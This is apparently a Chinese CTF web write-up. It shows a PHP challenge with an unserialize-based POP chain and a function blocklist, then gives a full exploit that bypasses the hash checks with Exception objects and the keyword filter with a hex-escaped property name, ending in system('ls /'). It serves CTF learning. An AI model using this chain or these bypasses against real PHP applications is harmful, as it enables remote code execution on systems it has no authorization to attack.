web

考点:原生类ReflectionFunction与call_user_func执行命令+hash触发Exception中__toString魔术绕过hash+变量名过滤-16进制绕过

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64


<?php
error_reporting(0);
class ZhiZuijM{
    public $user;
    public $hello;
    public function __invoke()
    {
    ($this->user)->lover($this->hello);
    }

}

class LaoLi{
    public $lover;
    public function __toString()
    {
    $func=$this->lover;
    $func();
    return "";
    }
}

class TingT{
    public $a;
    public $b;
    public $c;
    public $d;
    public function __call($func,$args)
    {
        if(!preg_match("/exec|system|shell_exec|popens|popen|curl_exec|curl_multi_exec|proc_open|proc_get_status|readfile|unlink|dl|memory_get_usage|passthru|pcntl_exec|mail|imap_open|imap_mail|putenv|ini_set|apache_setenv|symlink|linkopen_basedir|eval|assert|create_function|array_map|call_user_func_array|array_filter|uasort|preg_replace/i", $this->b)){   
            $a=new $args[0]($this->b);
            $c=$this->c;
            $a->$c($this->d);
            } 
        else {
            die("我这waf说白了就是摆设");
            }
    }
}


class LanBao{
    public $web;
    public $syc;
    public $lover;
    public function  __wakeup()
    {
        if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) )
        {
        echo "hash过了，还行";
        die($this->web);
        eval($this->syc);
        }
    }
}

if (isset($_GET['great'])){
    if(preg_match("/lover/i",$_GET['data'])){
        die("来点小知识");
    }
    unserialize($_GET['great']);
} else {
    highlight_file(__FILE__);
}

直接上exp

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65


<?php
class ZhiZuijM{
    public $user;
    public $hello="ReflectionFunction";
    public function __invoke()
    {
    ($this->user)->lover($this->hello);
    }

}

class LaoLi{
    public $lover;
    public function __toString()
    {
    $func=$this->lover;
    $func();
    return "";
    }
}

class TingT{
    public $a;
    public $b="call_user_func";
    public $c="invokeArgs";
    public $d=array('system','ls /');
    public function __call($func,$args)
    {
        if(!preg_match("/exec|system|shell_exec|popens|popen|curl_exec|curl_multi_exec|proc_open|proc_get_status|readfile|unlink|dl|memory_get_usage|passthru|pcntl_exec|mail|imap_open|imap_mail|putenv|ini_set|apache_setenv|symlink|linkopen_basedir|eval|assert|create_function|array_map|call_user_func_array|array_filter|uasort|preg_replace/i", $this->b)){   
        $a=new $args[0]($this->b);
        $c=$this->c;
        $a->$c($this->d);
        } else {
            die("我这waf说白了就是摆设");
        }

    }
}


class LanBao{
    public $web;
    public $syc;
    public $lover;
    public function __wakeup()
    {
        echo "hello";
        if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) )
        {
        echo "hash过了";
        die($this->web);
        eval($this->syc);
        }
    }
}

$a=new LanBao();
$a->syc=new Exception("",1);$a->lover=new Exception("",2);
$a->web=new LaoLi();
$a->web->lover=new ZhiZuijM();
$a->web->lover->user=new TingT();

$b=serialize($a);
$b=str_replace("s:5:\"lover\";","S:5:\"\\6cover\";",$b);
echo urlencode($b);